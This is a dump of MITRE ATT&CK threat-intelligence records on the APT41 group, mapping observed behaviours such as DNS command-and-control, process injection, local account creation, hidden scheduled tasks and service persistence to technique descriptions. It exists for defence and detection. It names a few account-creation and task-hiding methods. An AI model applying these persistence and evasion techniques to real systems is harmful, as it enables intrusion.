modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--97775c58-7cb1-46e0-9504-e60a459e44d0
revoked : False
technique : Fallback Channels
technique_description : Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1008
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--e0c1c9b9-b36e-4157-8dc1-26cd9ae25193
revoked : False
technique : Process Injection
technique_description : Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1055
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Access', 'Process: Process Modification', 'File: File Modification', 'Process: Process Metadata', 'File: File Metadata', 'Process: OS API Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
relationship_id : relationship--873faf92-be75-47e5-bf3e-b389a5bdc020
revoked : False
technique : DNS
technique_description : Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
relationship_id : relationship--adc6b431-0722-4287-8f37-e09ddb5b25fe
revoked : False
technique : System Network Configuration Discovery
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1016
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--635cbe30-392d-4e27-978e-66774357c762
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--410d7922-e288-49ea-9607-27942505a416
revoked : False
technique : Local Account
technique_description : Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1136.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network', 'Containers']
data_sources : ['User Account: User Account Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--6a653820-adc1-4068-ab78-9165f2a2c5c1
revoked : False
technique : Scheduled Task
technique_description : Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Creation', 'File: File Modification', 'File: File Creation', 'Process: Process Creation', 'Command: Command Execution', 'Network Traffic: Network Traffic Flow', 'Scheduled Job: Scheduled Job Creation']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
